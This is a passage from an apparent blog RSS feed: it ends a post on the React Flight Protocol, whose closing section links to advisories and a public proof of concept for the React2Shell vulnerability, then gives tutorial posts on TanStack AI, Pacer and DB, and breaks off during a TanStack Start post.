<p>The React Flight Protocol is a sophisticated yet elegant solution to the challenge of building modern, high-performance web applications with React. By defining a streamable, interleaved wire format, it enables Server Components to deliver significant performance benefits and a streamlined developer experience.</p>
<h3 id="heading-read-more-about-the-react2shell-vulnerability">Read More about the React2Shell vulnerability</h3>
<ol>
<li><p><a target="_blank" href="https://nextjs.org/blog/security-update-2025-12-11">https://nextjs.org/blog/security-update-2025-12-11</a></p>
</li>
<li><p><a target="_blank" href="https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/">https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/</a></p>
</li>
<li><p><a target="_blank" href="https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/">https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/</a></p>
</li>
</ol>
<p>PoC by Lachlan for React2Shell Vulnerability: <a target="_blank" href="https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc">https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc</a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack AI]]></title><description><![CDATA[The TanStack team just dropped the alpha release of TanStack AI — a framework-agnostic AI toolkit built for developers who want real control over their stack.
Today’s AI ecosystem pushes you into someone else’s platform, tools, and workflow. TanStack...]]></description><link>https://blog.nidhin.dev/tanstack-ai</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-ai</guid><category><![CDATA[tanstack ai]]></category><category><![CDATA[AI]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Remix]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 07 Dec 2025 18:24:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1765131744945/21888cb3-ce9f-4609-ac97-2a11189f65c2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The TanStack team just dropped the alpha release of TanStack AI — a framework-agnostic AI toolkit built for developers who want real control over their stack.</p>
<p>Today’s AI ecosystem pushes you into someone else’s platform, tools, and workflow. TanStack AI flips that. It’s open source, adapter-driven, and works with your existing stack instead of boxing you into a new one.</p>
<h2 id="heading-1whats-inside-tanstack-ai">1.What’s Inside TanStack AI</h2>
<ol>
<li><p><strong>Multi-Language Server Support</strong> : Out of the gate: <strong>JavaScript/TypeScript</strong>, <strong>PHP</strong>, and <strong>Python</strong> — each supporting full agentic flows and tool calling.</p>
</li>
<li><p><strong>Adapters for Real-World Providers</strong> : TypeScript adapters for</p>
</li>
</ol>
<ul>
<li><p>OpenAI</p>
</li>
<li><p>Anthropic</p>
</li>
<li><p>Gemini</p>
</li>
<li><p>Ollama</p>
</li>
</ul>
<ol start="3">
<li><p>Plus built-in summarization + embedding support.</p>
</li>
<li><p><strong>Open Protocol</strong> : The server - client protocol is fully documented. Use any language. Use any transport. If your backend speaks the protocol, the client works.</p>
</li>
</ol>
<h2 id="heading-2why-tanstack-ai-exists">2.Why TanStack AI Exists</h2>
<p>Developers deserve AI tools without:</p>
<ul>
<li><p>vendor lock-in</p>
</li>
<li><p>proprietary platforms</p>
</li>
<li><p>ecosystem traps</p>
</li>
</ul>
<p>Just <strong>open source</strong>, <strong>framework-agnostic</strong>, <strong>type-safe</strong>, <strong>developer-first</strong> tooling — from the same team that brought you TanStack Query, Table, Router, and more.</p>
<h2 id="heading-3framework-agnostic">3.Framework Agnostic</h2>
<p>TanStack AI supports the following frameworks</p>
<ul>
<li><p><strong>Next.js</strong> - API routes and App Router</p>
</li>
<li><p><strong>TanStack Start</strong> - React Start or Solid Start (recommended!)</p>
</li>
<li><p><strong>Express</strong> - Node.js server</p>
</li>
<li><p><strong>Remix Router v7</strong> - Loaders and actions</p>
</li>
</ul>
<p>TanStack AI lets you define a tool once and provide environment-specific implementations. Using toolDefinition() to declare the tool’s input/output types and the server behavior with .server() (or a client implementation with .client()). These isomorphic tools can be invoked from the AI runtime regardless of framework.</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { toolDefinition } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/ai'</span>

<span class="hljs-comment">// Define a tool</span>
<span class="hljs-keyword">const</span> getProductsDef = toolDefinition({
  name: <span class="hljs-string">'getProducts'</span>,
  inputSchema: z.object({ query: z.string() }),
  outputSchema: z.array(z.object({ id: z.string(), name: z.string() })),
})

<span class="hljs-comment">// Create server implementation</span>
<span class="hljs-keyword">const</span> getProducts = getProductsDef.server(<span class="hljs-keyword">async</span> ({ query }) =&gt; {
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">await</span> db.products.search(query)
})

<span class="hljs-comment">// Use in AI chat</span>
chat({ tools: [getProducts] })
</code></pre>
<h2 id="heading-4installation-amp-quick-start">4.Installation &amp; Quick Start</h2>
<p>You can install the TanStack AI in minutes</p>
<pre><code class="lang-bash">npm install @tanstack/ai @tanstack/ai-react @tanstack/ai-openai
</code></pre>
<h3 id="heading-server-setup">Server Setup</h3>
<p>First, create an API route that handles chat requests. Here's a simplified example:</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// app/api/chat/route.ts (Next.js)</span>
<span class="hljs-comment">// or src/routes/api/chat.ts (TanStack Start)</span>
<span class="hljs-keyword">import</span> { chat, toStreamResponse } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai"</span>;
<span class="hljs-keyword">import</span> { openai } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai-openai"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">POST</span>(<span class="hljs-params">request: Request</span>) </span>{
  <span class="hljs-comment">// Check for API key</span>
  <span class="hljs-keyword">if</span> (!process.env.OPENAI_API_KEY) {
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> Response(
      <span class="hljs-built_in">JSON</span>.stringify({
        error: <span class="hljs-string">"OPENAI_API_KEY not configured"</span>,
      }),
      {
        status: <span class="hljs-number">500</span>,
        headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> },
      }
    );
  }

  <span class="hljs-keyword">const</span> { messages, conversationId } = <span class="hljs-keyword">await</span> request.json();

  <span class="hljs-keyword">try</span> {
    <span class="hljs-comment">// Create a streaming chat response</span>
    <span class="hljs-keyword">const</span> stream = chat({
      adapter: openai(),
      messages,
      model: <span class="hljs-string">"gpt-4o"</span>,
      conversationId
    });

    <span class="hljs-comment">// Convert stream to HTTP response</span>
    <span class="hljs-keyword">return</span> toStreamResponse(stream);
  } <span class="hljs-keyword">catch</span> (error: <span class="hljs-built_in">any</span>) {
    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> Response(
      <span class="hljs-built_in">JSON</span>.stringify({
        error: error.message || <span class="hljs-string">"An error occurred"</span>,
      }),
      {
        status: <span class="hljs-number">500</span>,
        headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> },
      }
    );
  }
}
</code></pre>
<h3 id="heading-client-setup">Client Setup</h3>
<p>To use the chat API from your React frontend, create a Chat component:</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// components/Chat.tsx</span>
<span class="hljs-keyword">import</span> { useState } <span class="hljs-keyword">from</span> <span class="hljs-string">"react"</span>;
<span class="hljs-keyword">import</span> { useChat, fetchServerSentEvents } <span class="hljs-keyword">from</span> <span class="hljs-string">"@tanstack/ai-react"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Chat</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> [input, setInput] = useState(<span class="hljs-string">""</span>);

  <span class="hljs-keyword">const</span> { messages, sendMessage, isLoading } = useChat({
    connection: fetchServerSentEvents(<span class="hljs-string">"/api/chat"</span>),
  });

  <span class="hljs-keyword">const</span> handleSubmit = <span class="hljs-function">(<span class="hljs-params">e: React.FormEvent</span>) =&gt;</span> {
    e.preventDefault();
    <span class="hljs-keyword">if</span> (input.trim() &amp;&amp; !isLoading) {
      sendMessage(input);
      setInput(<span class="hljs-string">""</span>);
    }
  };

  <span class="hljs-keyword">return</span> (
    &lt;div className=<span class="hljs-string">"flex flex-col h-screen"</span>&gt;
      {<span class="hljs-comment">/* Messages */</span>}
      &lt;div className=<span class="hljs-string">"flex-1 overflow-y-auto p-4"</span>&gt;
        {messages.map(<span class="hljs-function">(<span class="hljs-params">message</span>) =&gt;</span> (
          &lt;div
            key={message.id}
            className={<span class="hljs-string">`mb-4 <span class="hljs-subst">${
              message.role === <span class="hljs-string">"assistant"</span> ? <span class="hljs-string">"text-blue-600"</span> : <span class="hljs-string">"text-gray-800"</span>
            }</span>`</span>}
          &gt;
            &lt;div className=<span class="hljs-string">"font-semibold mb-1"</span>&gt;
              {message.role === <span class="hljs-string">"assistant"</span> ? <span class="hljs-string">"Assistant"</span> : <span class="hljs-string">"You"</span>}
            &lt;/div&gt;
            &lt;div&gt;
              {message.parts.map(<span class="hljs-function">(<span class="hljs-params">part, idx</span>) =&gt;</span> {
                <span class="hljs-keyword">if</span> (part.type === <span class="hljs-string">"thinking"</span>) {
                  <span class="hljs-keyword">return</span> (
                    &lt;div
                      key={idx}
                      className=<span class="hljs-string">"text-sm text-gray-500 italic mb-2"</span>
                    &gt;
                      💭 Thinking: {part.content}
                    &lt;/div&gt;
                  );
                }
                <span class="hljs-keyword">if</span> (part.type === <span class="hljs-string">"text"</span>) {
                  <span class="hljs-keyword">return</span> &lt;div key={idx}&gt;{part.content}&lt;/div&gt;;
                }
                <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;
              })}
            &lt;/div&gt;
          &lt;/div&gt;
        ))}
      &lt;/div&gt;

      {<span class="hljs-comment">/* Input */</span>}
      &lt;form onSubmit={handleSubmit} className=<span class="hljs-string">"p-4 border-t"</span>&gt;
        &lt;div className=<span class="hljs-string">"flex gap-2"</span>&gt;
          &lt;input
            <span class="hljs-keyword">type</span>=<span class="hljs-string">"text"</span>
            value={input}
            onChange={<span class="hljs-function">(<span class="hljs-params">e</span>) =&gt;</span> setInput(e.target.value)}
            placeholder=<span class="hljs-string">"Type a message..."</span>
            className=<span class="hljs-string">"flex-1 px-4 py-2 border rounded-lg"</span>
            disabled={isLoading}
          /&gt;
          &lt;button
            <span class="hljs-keyword">type</span>=<span class="hljs-string">"submit"</span>
            disabled={!input.trim() || isLoading}
            className=<span class="hljs-string">"px-6 py-2 bg-blue-600 text-white rounded-lg disabled:opacity-50"</span>
          &gt;
            Send
          &lt;/button&gt;
        &lt;/div&gt;
      &lt;/form&gt;
    &lt;/div&gt;
  );
}
</code></pre>
<p>Ensure you set the OPENAI_API_KEY in your .env</p>
<p>Now you now have a working chat application. The useChat hook handles:</p>
<ul>
<li><p>Message state management</p>
</li>
<li><p>Streaming responses</p>
</li>
<li><p>Loading states</p>
</li>
<li><p>Error handling</p>
</li>
</ul>
<h2 id="heading-5devtools">5.DevTools</h2>
<p>TanStack Devtools is a unified devtools panel for inspecting and debugging TanStack libraries, including TanStack AI. It provides real-time insights into AI interactions, tool calls, and state changes.</p>
<ul>
<li><p><strong>Real-time Monitoring</strong> - View live chat messages, tool invocations, and AI responses.</p>
</li>
<li><p><strong>Tool Call Inspection</strong> - Inspect input and output of tool calls.</p>
</li>
<li><p><strong>State Visualization</strong> - Visualize chat state and message history.</p>
</li>
<li><p><strong>Error Tracking</strong> - Monitor errors and exceptions in AI interactions.</p>
</li>
</ul>
<h3 id="heading-installation">Installation</h3>
<pre><code class="lang-bash">npm install -D @tanstack/react-ai-devtools @tanstack/react-devtools
</code></pre>
<h3 id="heading-usage">Usage</h3>
<p>Import and include the Devtools component in your application</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { TanStackDevtools } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/react-devtools'</span>
<span class="hljs-keyword">import</span> { aiDevtoolsPlugin } <span class="hljs-keyword">from</span> <span class="hljs-string">'@tanstack/react-ai-devtools'</span>

<span class="hljs-keyword">const</span> App = <span class="hljs-function">() =&gt;</span> {
  <span class="hljs-keyword">return</span> (
    &lt;&gt;
       &lt;TanStackDevtools 
          plugins={[
            <span class="hljs-comment">// ... other plugins</span>
            aiDevtoolsPlugin(),
          ]}
          <span class="hljs-comment">// this config is important to connect to the server event bus</span>
          eventBusConfig={{
            connectToServerBus: <span class="hljs-literal">true</span>,
          }}
        /&gt;
    &lt;/&gt;
  )
}
</code></pre>
<p>That’s a quick overview of TanStack AI. Check the official docs for more info <a target="_blank" href="https://tanstack.com/ai/latest">https://tanstack.com/ai/latest</a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack Pacer]]></title><description><![CDATA[TanStack Pacer is a library from the TanStack team where they share the high quality utilities for controlling function execution timings in the applications.
TanStack Pacer is currently a client-side only library but it is designed to be used in ser...]]></description><link>https://blog.nidhin.dev/tanstack-pacer</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-pacer</guid><category><![CDATA[tanstack-pacer]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[pacer]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 29 Nov 2025 17:46:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764438195091/1d19f20c-1058-44e7-887d-ebd785251edd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>TanStack Pacer is a library from the TanStack team where they share the high quality utilities for controlling function execution timings in the applications.</p>
<p>TanStack Pacer is currently a client-side only library but it is designed to be used in server-side as well.</p>
<h2 id="heading-features-of-tanstack-pacer">Features of TanStack Pacer</h2>
<ol>
<li><p><strong>Debouncing</strong> - Delay execution until after a period of inactivity for when you only care about the last execution in a sequence.</p>
</li>
<li><p><strong>Throttling</strong> - Smoothly limit the rate at which a function can fire</p>
</li>
<li><p><strong>Rate Limiting</strong> - Limit the rate at which a function can fire over a period of time</p>
</li>
<li><p><strong>Queuing</strong> - Queue functions to be executed in a specific order, Choose from FIFO, LIFO, and Priority queue implementations</p>
</li>
<li><p><strong>Batching</strong> - Chunk up multiple operations into larger batches to reduce total back-and-forth operations</p>
</li>
<li><p><strong>Async or Sync Variations</strong> - Choose between synchronous and asynchronous versions of each utility</p>
</li>
<li><p><strong>State Management</strong> - Uses TanStack Store under the hood for state management with fine-grained reactivity</p>
</li>
<li><p><strong>Convenient Hooks</strong> - Reduce boilerplate code with pre-built hooks like useDebouncedCallback, useThrottledValue, and useQueuedState, and more.</p>
</li>
<li><p><strong>Tree-shaking</strong> - Get tree-shaking right for your applications by default</p>
</li>
<li><p><strong>Type safety</strong> - Full type safety with TypeScript that makes sure that your functions will always be called with the correct arguments</p>
</li>
</ol>
<h2 id="heading-installation">Installation</h2>
<p>You can install TanStack Pacer.</p>
<p>To install it in React you can use the below command</p>
<pre><code class="lang-bash">npm install @tanstack/react-pacer
</code></pre>
<p>To use the devtools for debugging and monitoring, install both the framework devtools and the Pacer devtools packages</p>
<pre><code class="lang-bash">npm install @tanstack/react-devtools @tanstack/react-pacer-devtools
</code></pre>
<h2 id="heading-debouncing">Debouncing</h2>
<p>Debouncing is a technique that delays the execution of a function until a specified period of inactivity time occured</p>
<pre><code class="lang-bash"><span class="hljs-string">"use client"</span>
import { useState, useEffect } from <span class="hljs-string">"react"</span>
import { useDebouncedValue } from <span class="hljs-string">"@tanstack/react-pacer"</span>

<span class="hljs-built_in">export</span> default <span class="hljs-keyword">function</span> <span class="hljs-function"><span class="hljs-title">ProductSearch</span></span>() {
  const [input, setInput] = useState(<span class="hljs-string">""</span>)
  const [results, setResults] = useState&lt;string[]&gt;([])

  // Debounce input by 400ms
  const [debouncedInput] = useDebouncedValue(input, { <span class="hljs-built_in">wait</span>: 400 })

  useEffect(() =&gt; {
    <span class="hljs-keyword">if</span> (!debouncedInput) {
      setResults([])
      <span class="hljs-built_in">return</span>
    }

    const fetchData = async () =&gt; {
      const response = await fetch(`/api/products?query=<span class="hljs-variable">${debouncedInput}</span>`)
      const json = await response.json()
      setResults(json.items)
    }

    fetchData()
  }, [debouncedInput])

  <span class="hljs-built_in">return</span> (
    &lt;div className=<span class="hljs-string">"space-y-2"</span>&gt;
      &lt;input
        className=<span class="hljs-string">"border p-2 w-full"</span>
        placeholder=<span class="hljs-string">"Search products..."</span>
        value={input}
        onChange={(e) =&gt; setInput(e.target.value)}
      /&gt;

      {/* Render suggestions */}
      {results.length &gt; 0 &amp;&amp; (
        &lt;ul className=<span class="hljs-string">"border rounded p-2 bg-white"</span>&gt;
          {results.map(item =&gt; (
            &lt;li key={item} className=<span class="hljs-string">"py-1 border-b last:border-none"</span>&gt;
              {item}
            &lt;/li&gt;
          ))}
        &lt;/ul&gt;
      )}
    &lt;/div&gt;
  )
}
</code></pre>
<p>The above example updates the url after 400ms</p>
<h2 id="heading-throttling">Throttling</h2>
<p>Throttling ensures function executions are evenly spaced over time. Unlike rate limiting which allows bursts of executions up to a limit, or debouncing which waits for activity to stop, throttling creates a smoother execution pattern by enforcing consistent delays between calls.</p>
<pre><code class="lang-bash"><span class="hljs-string">"use client"</span>
import { throttle } from <span class="hljs-string">"@tanstack/react-pacer"</span>

<span class="hljs-built_in">export</span> default <span class="hljs-keyword">function</span> <span class="hljs-function"><span class="hljs-title">SafeButton</span></span>() {
  const handleClick = throttle(() =&gt; {
    alert(<span class="hljs-string">"Action performed"</span>)
  }, { <span class="hljs-built_in">wait</span>: 1000 }) // only allowed once per second

  <span class="hljs-built_in">return</span> (
    &lt;button
      onClick={handleClick}
      className=<span class="hljs-string">"px-4 py-2 bg-blue-600 text-white rounded"</span>
    &gt;
      Click Me Fast — I’m Throttled
    &lt;/button&gt;
  )
}
</code></pre>
<p>Throttled Button (prevents spam clicks) useful for API calls, forms submission or payment prompts</p>
<h2 id="heading-rate-limiting">Rate Limiting</h2>
<p>Rate Limiting is a technique that limits the rate at which a function can execute over a specific time window. It is particularly useful for scenarios where you want to prevent a function from being called too frequently, such as when handling API requests or other external service calls.</p>
<pre><code class="lang-bash">import { rateLimit } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const safeLogin = rateLimit(
  async (email: string, password: string) =&gt; {
    console.log(<span class="hljs-string">"Login attempted"</span>)
    // Backend login API here
    <span class="hljs-built_in">return</span> { success: <span class="hljs-literal">true</span> }
  },
  { <span class="hljs-built_in">limit</span>: 3, interval: 30_000 } // allow 3 attempts every 30s
)

// Usage
safeLogin(<span class="hljs-string">"user@mail.com"</span>, <span class="hljs-string">"pass123"</span>).<span class="hljs-keyword">then</span>(console.log)
safeLogin(<span class="hljs-string">"user@mail.com"</span>, <span class="hljs-string">"pass123"</span>).<span class="hljs-keyword">then</span>(console.log)
// 4th call within 30s will be rate-limited
</code></pre>
<h2 id="heading-queuing">Queuing</h2>
<p>Queuing ensures that every operation is eventually processed, even if they come in faster than they can be handled. Unlike the other execution control techniques that drop excess operations, queuing buffers operations in an ordered list and processes them according to specific rules.</p>
<pre><code class="lang-bash">import { queue } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const writeToDB = queue(
  async (record: any) =&gt; {
    console.log(<span class="hljs-string">"Writing record:"</span>, record.id)
    await fetch(<span class="hljs-string">"/api/db/save"</span>, {
      method: <span class="hljs-string">"POST"</span>,
      body: JSON.stringify(record),
      headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> }
    })
  },
  { concurrency: 3 } // controlled parallelism
)

// Usage
records.forEach(r =&gt; writeToDB(r))
</code></pre>
<p>Queue Database Writes to Avoid Locking. Batch DB operations without hammering the server.</p>
<h2 id="heading-batching">Batching</h2>
<p>Batching collects items over time or until a certain size is reached, then processes them all at once. This is ideal for scenarios where processing items in bulk is more efficient than handling them one by one.</p>
<pre><code class="lang-bash">import { batch } from <span class="hljs-string">"@tanstack/react-pacer"</span>

const queueMessages = batch(async (msgs: string[]) =&gt; {
  await fetch(<span class="hljs-string">"/api/messages/bulk"</span>, {
    method: <span class="hljs-string">"POST"</span>,
    body: JSON.stringify(msgs),
    headers: { <span class="hljs-string">"Content-Type"</span>: <span class="hljs-string">"application/json"</span> }
  })
}, { maxSize: 20, <span class="hljs-built_in">wait</span>: 1500 }) // send when 20 msgs or 1.5s idle

// Usage
queueMessages(<span class="hljs-string">"Hello"</span>)
queueMessages(<span class="hljs-string">"How are you?"</span>)
queueMessages(<span class="hljs-string">"What's new?"</span>)
</code></pre>
<p>Batch messages before sending to server. Reduces network calls by grouping multiple messages.</p>
<h2 id="heading-final-notes">Final Notes</h2>
<p>Using the Tanstack Pacer in your application helps precise control over function execution, leading to smoother UX, reduced API costs, and improved performance. Whether you’re handling user input, managing API calls, or orchestrating complex async workflows, these utilities are your one-stop shop for execution timing</p>
]]></content:encoded></item><item><title><![CDATA[TanStack DB: The Secret to Building Lightning-Fast, Modern Apps]]></title><description><![CDATA[Building fast, modern applications is harder than ever. Your backend might be powerful, your UI might be beautiful—but if the data flowing between them is slow or clunky, your app feels slow.
TanStack DB changes that.
It’s a reactive, client-first da...]]></description><link>https://blog.nidhin.dev/tanstack-db-the-secret-to-building-lightning-fast-modern-apps</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-db-the-secret-to-building-lightning-fast-modern-apps</guid><category><![CDATA[tanstackdb]]></category><category><![CDATA[React]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[JavaScript]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 21 Nov 2025 18:39:01 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1763750125395/a917141c-247d-4066-8655-8ff6f6ddb971.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Building fast, modern applications is harder than ever. Your backend might be powerful, your UI might be beautiful—but if the data flowing between them is slow or clunky, your app <em>feels</em> slow.</p>
<p><strong>TanStack DB</strong> changes that.</p>
<p>It’s a reactive, client-first data store that makes your frontend feel instant, smooth, and reliable—no matter how much data your app handles.</p>
<h2 id="heading-why-tanstack-db-exists">Why TanStack DB Exists</h2>
<p>If you’ve built interactive apps before, you’ve probably run into familiar pain points:</p>
<ul>
<li><p>You end up writing <strong>custom API endpoints</strong> for every page</p>
</li>
<li><p>Loading everything upfront makes your app <strong>slow and memory-heavy</strong></p>
</li>
<li><p>State management gets <strong>messy</strong>, especially as your app grows</p>
</li>
</ul>
<p>TanStack DB flips this model and gives you:</p>
<ul>
<li><p><strong>Just-in-time data loading</strong> — fetch only what’s needed, when it’s needed</p>
</li>
<li><p><strong>Fast client-side querying</strong> — almost like having a tiny embedded database</p>
</li>
<li><p><strong>Optimistic updates</strong> — your UI updates instantly, even on slow networks</p>
</li>
</ul>
<p>With TanStack DB, your frontend stays fast and fluid—while your backend handles the heavy lifting behind the scenes.</p>
<h2 id="heading-how-tanstack-db-makes-apps-feel-fast">How TanStack DB Makes Apps Feel Fast</h2>
<p>At its core, TanStack DB combines a local query engine with real-time sync and optimistic updates.</p>
<ul>
<li><p><strong>Blazing-fast queries</strong>: Think sub-millisecond results, even with huge datasets</p>
</li>
<li><p><strong>Real-time updates</strong>: UI changes the moment your data does—users never see stale views</p>
</li>
<li><p><strong>Optimistic mutations</strong>: Edits look instant to the user, while the backend syncs in the background</p>
</li>
</ul>
<p>It plays nicely whether you work with REST APIs, sync engines like ElectricSQL, or other data sources.</p>
<h2 id="heading-the-tanstack-db-approach">The TanStack DB Approach</h2>
<p>Instead of “fetch everything” or “build an endpoint for every UI,” you:</p>
<ul>
<li><p><strong>Define collections</strong>: client-side sets of structured data (like a table in a database).​</p>
</li>
<li><p><strong>Run live queries</strong>: components react immediately as underlying data changes.</p>
</li>
<li><p><strong>Make optimistic updates</strong>: UI updates before the server replies, rolling back if something fails.</p>
</li>
<li><p>Choose sync mode per collection: eager (load up front), on-demand (load as needed), or progressive (hybrid).</p>
</li>
</ul>
<h3 id="heading-key-features">Key Features</h3>
<ul>
<li><p><strong>Live Queries</strong>: Components subscribe to exactly the data they need, instantly re-rendering if anything changes.</p>
</li>
<li><p><strong>Cross-collection Joins</strong>: Easily combine multiple sources, so your UI always shows up-to-date, joined data.</p>
</li>
<li><p><strong>Local-First</strong>: Data lives client-side, so offline and near-instant interactions just work.</p>
</li>
</ul>
<h3 id="heading-example">Example</h3>
<p>Imagine a task app. With TanStack DB, you:</p>
<ul>
<li><p>Define a “todo” collection.</p>
</li>
<li><p>Use a live query to show all incomplete tasks. Any update (even from another tab or device) instantly updates your UI.</p>
</li>
<li><p>Mark a task done? The UI updates now, and the backend call happens behind the scenes</p>
</li>
</ul>
<p>No more manual syncing, no manual state juggling—everything feels alive by default.</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Define collections to load data into</span>
<span class="hljs-keyword">const</span> todoCollection = createCollection({
  <span class="hljs-comment">// ...your config</span>
  <span class="hljs-attr">onUpdate</span>: updateMutationFn,
})

<span class="hljs-keyword">const</span> Todos = <span class="hljs-function">() =&gt;</span> {
  <span class="hljs-comment">// Bind data using live queries</span>
  <span class="hljs-keyword">const</span> { <span class="hljs-attr">data</span>: todos } = useLiveQuery(<span class="hljs-function">(<span class="hljs-params">q</span>) =&gt;</span>
    q.from({ <span class="hljs-attr">todo</span>: todoCollection }).where(<span class="hljs-function">(<span class="hljs-params">{ todo }</span>) =&gt;</span> todo.completed)
  )

  <span class="hljs-keyword">const</span> complete = <span class="hljs-function">(<span class="hljs-params">todo</span>) =&gt;</span> {
    <span class="hljs-comment">// Instantly applies optimistic state</span>
    todoCollection.update(todo.id, <span class="hljs-function">(<span class="hljs-params">draft</span>) =&gt;</span> {
      draft.completed = <span class="hljs-literal">true</span>
    })
  }

  <span class="hljs-keyword">return</span> (
    <span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">ul</span>&gt;</span>
      {todos.map((todo) =&gt; (
        <span class="hljs-tag">&lt;<span class="hljs-name">li</span> <span class="hljs-attr">key</span>=<span class="hljs-string">{todo.id}</span> <span class="hljs-attr">onClick</span>=<span class="hljs-string">{()</span> =&gt;</span> complete(todo)}&gt;
          {todo.text}
        <span class="hljs-tag">&lt;/<span class="hljs-name">li</span>&gt;</span>
      ))}
    <span class="hljs-tag">&lt;/<span class="hljs-name">ul</span>&gt;</span></span>
  )
}
</code></pre>
<h2 id="heading-using-tanstack-db">Using TanStack DB</h2>
<p>TanStack DB works with:</p>
<ul>
<li><p><strong>REST APIs</strong> (via TanStack Query)</p>
</li>
<li><p><strong>Sync Engines</strong> for real-time, distributed data (ElectricSQL, PowerSync, RxDB, more)</p>
</li>
<li><p><strong>Local Storage</strong> for preferences or offline-only data.</p>
</li>
</ul>
<p>Mix and match as you need—your app doesn’t care where the data comes from.</p>
<h2 id="heading-schema-your-datas-safety-net">Schema: Your Data’s Safety Net</h2>
<p>TanStack DB collections can use schemas (via Zod, Valibot, etc.) for:</p>
<ul>
<li><p>Type safety (auto TypeScript inference)</p>
</li>
<li><p>Runtime validation (catch errors before bad data is stored)</p>
</li>
<li><p>Automatic defaults/transformations</p>
</li>
</ul>
<p>This means robust, trustworthy data structures—just like a real database.</p>
<h3 id="heading-installation">Installation</h3>
<p>Each supported framework comes with its own package. Each framework package re-exports everything from the core @tanstack/db package.</p>
<pre><code class="lang-bash"><span class="hljs-comment">#React</span>

npm install @tanstack/react-db

<span class="hljs-comment">#Vue</span>

npm install @tanstack/vue-db

<span class="hljs-comment">#Angular</span>

npm install @tanstack/angular-db
</code></pre>
<p>Check out the official docs for setup guides, tutorials, and detailed examples:</p>
<p><a target="_blank" href="http://tanstack.com/db/latest/docs/installation#react"><strong>tanstack.com/db/latest/docs/installation#react</strong></a></p>
]]></content:encoded></item><item><title><![CDATA[TanStack Start]]></title><description><![CDATA[1.What is TanStack Start
TanStack Start is a comprehensive full-stack React framework built on two key technologies:

TanStack Router: TanStack Start relies entirely on TanStack Router for its routing system. The Router is known for being type-safe a...]]></description><link>https://blog.nidhin.dev/tanstack-start</link><guid isPermaLink="true">https://blog.nidhin.dev/tanstack-start</guid><category><![CDATA[tanstack-start]]></category><category><![CDATA[tanstack]]></category><category><![CDATA[React]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Wed, 05 Nov 2025 14:51:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1762354242812/1cd59a78-a416-40e4-a02b-0c0c8b9dc585.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-1what-is-tanstack-start">1.What is TanStack Start</h2>
<p>TanStack Start is a comprehensive full-stack React framework built on two key technologies:</p>
<ol>
<li><p>TanStack Router: TanStack Start relies entirely on TanStack Router for its routing system. The Router is known for being type-safe and supporting advanced features like nested routing, search parameters, and data loading.</p>
</li>
<li><p>Vite: Start leverages Vite, a modern build tool that ensures fast development cycles through hot module replacement and optimized production builds. Thanks to its integration with Vite, TanStack Start is ready to be developed and deployed to virtually any hosting provider or runtime you choose</p>
</li>
</ol>
<h2 id="heading-2full-stack-capabilities-beyond-the-router">2.Full-Stack Capabilities (Beyond the Router)</h2>
<p>While the router forms the base (accounting for 90% of the framework), TanStack Start provides a suite of features that enhance the development process by handling both client and server needs</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Features</strong></td><td><strong>Description</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Full-document SSR</td><td>Provides Server-Side Rendering capabilities, which leads to improved performance and SEO</td></tr>
<tr>
